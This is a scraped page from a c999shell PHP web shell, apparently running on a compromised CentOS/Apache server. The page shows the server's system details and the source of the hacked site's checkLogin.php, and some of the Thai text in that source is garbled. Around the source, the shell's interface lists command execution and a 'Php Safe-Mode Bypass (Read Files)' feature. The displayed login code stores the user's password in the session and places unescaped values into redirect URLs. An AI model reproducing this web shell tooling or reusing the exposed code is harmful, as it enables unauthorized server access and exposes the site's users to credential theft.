Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/reportEregis111/ drwxr-xr-x |
Viewing file: checkLogin.php (3.04 KB) -rw-r--r-- Select action/file-type: (+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) | <? include_once("global.php"); include_once("./classes/clsConnection.php"); include_once("./classes/clsDB.php"); include("clsUmUser.php"); include_once("clsUser.php"); include_once("clsUmUserGroup.php"); include_once("clsUmGPermission.php"); include_once("clsUmPermission.php"); session_start(); //if (! session_is_registered ("oU")) { $oU = NULL; if (! isset($_SESSION['oU'])) { //session_register("oU"); $_SESSION['oU']=new clsUser(); //$oU = new clsUser(); $oU = $_SESSION['oU']; } session_regenerate_id(); $SID=session_id(); $oCx = new clsConnection($GLOBALS['HOST'], $GLOBALS['DB'], $GLOBALS['USER'], $GLOBALS['PASSWORD']); $oUs = new umuser($oCx); $oUg = new umusergroup($oCx); $oGp = new umgpermission($oCx); $oUp = new umpermission($oCx); $oUs->SearchByLogin($_POST['username'], $_POST['pass']); if ($oUs->GetRecord()) { if ($oUs->UsAdmin!=""){ $oU->userID=$oUs->UsID; $oU->userLogin=$oUs->UsLogin; $oU->userName=$oUs->UsName; $oU->userPassword=$oUs->UsPassword; $oU->userDptCode=$oUs->dptID; $oU->userDptName=$oUs->dptName; $oU->userPosCode=$oUs->posID; $oU->userPosName=$oUs->posName; $oU->active=$oUs->UsActive; $oU->WgID=$oUs->UsWgID; $oU->userIP=getenv("REMOTE_ADDR"); $oUs->SetSessionID($oUs->UsID, session_id()); $oU->sessionID = session_id(); //================================== //=get group permission and user permission //get group permission of user $oUg->RSgroupByUs($oU->userID); while ($oUg->GetRecord()){ //get group menu permission $oGp->RSMnByGpID($oUg->UgGpID); while($oGp->GetRecord()){ //create array of menu permission by group $oU->aGp[$oUg->UgGpID.$oGp->gpMnID]=array($oGp->gpX,$oGp->gpC,$oGp->gpR,$oGp->gpU,$oGp->gpD); } } //get user permission $oUp->RSMnByUs($oU->userID); while($oUp->GetRecord()){ //create array of menu permission by user $oU->aUp[$oU->userID.$oUp->pmMnID]=array($oUp->pmX,$oUp->pmC,$oUp->pmR,$oUp->pmU,$oUp->pmD); } //================================== if($oUs->UsLogin) { //echo "<meta http-equiv='refresh' content='0; URL=admin.php?name=$oUs->UsName&&userLogin=$oUs->UsLogin'>"; echo "<meta http-equiv='refresh' content='0; URL=main.php?name=$oUs->UsName&&userLogin=$oUs->UsLogin'>"; } }else{ echo "<br><br><br><br><br><br><br><br><br><br> <p align=center> <table align=center border=0 cellpadding=3 cellspacing=1 bgcolor=red> <tr align=center bgcolor=#ff9999><th>ÿ?ÿÿ??ÿÿ?</th></tr> <tr align=center bgcolor=#ffffff><td>??ÿ?ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ? ÿÿÿÿÿÿÿ?ÿÿÿ?ÿÿ<br><br>$query</td></tr> </table> <br><a href=\"javascript:window.history.back();\">ÿÿ?ÿÿ?</a> </p>"; } exit(); } else{ $oU->userID=""; $oU->userLogin=""; $oU->userPassword=""; $oU->userIP=""; $oU->userName=""; $oU->userDptCode=""; $oU->userDptName=""; $oU->userPosCode=""; $oU->userPosName=""; $oU->userPsCode="-1"; $oU->sessionID=""; $oU->Lang = "th"; $oU->WgID=""; $oU->StID=""; $oU->GpI=""; $oU->MnID=""; $oU->X=""; $oU->C=""; $oU->R=""; $oU->U=""; $oU->D=""; echo "<meta http-equiv='refresh' content='0; URL=loginFailed.php'>"; exit(); } ?> |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.005 ]-- |